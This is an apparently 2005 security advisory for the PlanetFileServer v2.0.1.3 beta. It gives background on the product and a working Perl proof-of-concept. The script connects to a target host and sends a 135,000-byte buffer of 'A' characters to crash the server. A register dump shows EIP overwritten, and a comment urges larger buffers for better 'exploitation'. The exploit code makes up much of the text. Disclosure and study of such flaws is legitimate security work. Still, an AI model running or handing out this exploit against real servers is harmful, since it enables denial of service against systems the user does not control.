Software: PlanetFileServer Corporation: PlanetDNS Software Version: v2.0.1.3 Vulnerability: Denial of Service - Crash Vulnerability ------------------------------- BACKGROUND __________ PlanetFileServer v2.0.1.3 is a BETA product PlanetDNS provides products and services that enable you to host your own web server, e-mail server, FTP server and more, using your own computer and your existing Internet connection. PlanetFileServer Standard is available only in "BETA Downloads". All of PlanetDNS' products undergo extensive internal and external testing before release. During external testing we provide pre-release versions of our software free of charge to selected testers (individuals and organizations) for their use, in return for which the testers provide feedback on any problems they have found and comments on the product. Source: www.planetdns.net Software: www.planetdns.net/client/beta/pfilestd32v201.exe Proof of Concept ________________ #!/usr/bin/perl # Vulnerability: Denial Of Service - Crash # Discovered on: June 28, 2005 # Coded by: fRoGGz - SecuBox Labs # Severity: Normal # ----------- // Registers // ----------- # Dynamic Library Link of "NewAce Corporation" called "mshftp.dll" is the real problem. # varmodAddVariable() returned error code %d # EAX 0163D940 # ECX 41414141 # EDX 784751B6 # EBX 0163FFDC # ESP 0163D8A8 # EBP 0163D8C8 # ESI 0163D968 # EDI 00000400 # EIP 41414141 # ------------------------------------ use IO::Socket; use strict; if(!$ARGV[1]) { die "Utilisation: perl -w pfsdos.pl \n"; } my($socket) = ""; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],PeerPort => $ARGV[1],Proto => "TCP")) { print "\n\nPlanetDNS Software - PlanetFileServer v2.0.1.3\r\n"; print "Denial Of Service - Crash Vulnerability\r\n"; print "---------------------------------------------\r\n"; print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n"; print "[+] Connexion sur $ARGV[0]:$ARGV[1] ...\r\n"; print "[+] Envoi du buffer malicieux."; # On our config the value "134891" is the min for DoS, but more is better for a great successfull exploitation. # Security Filter Option used 7 levels, so .... # If you change levels to the max you must set the buffer size or use this PoC 2 times, it works well. print $socket "\x41" x 135000 . "\r\n"; close($socket); } else { print "[-] Impossible de se connecter sur $ARGV[0]:$ARGV[1]\n"; } ----------------------------------- Vendor have been contacted on: 1, July 2005 Software will be corrected in the future versions. ----------------------------------- fRoGGz - unsecure[at]writeme[dot]com SecuBox Labs - secubox[dot]teria[dot]org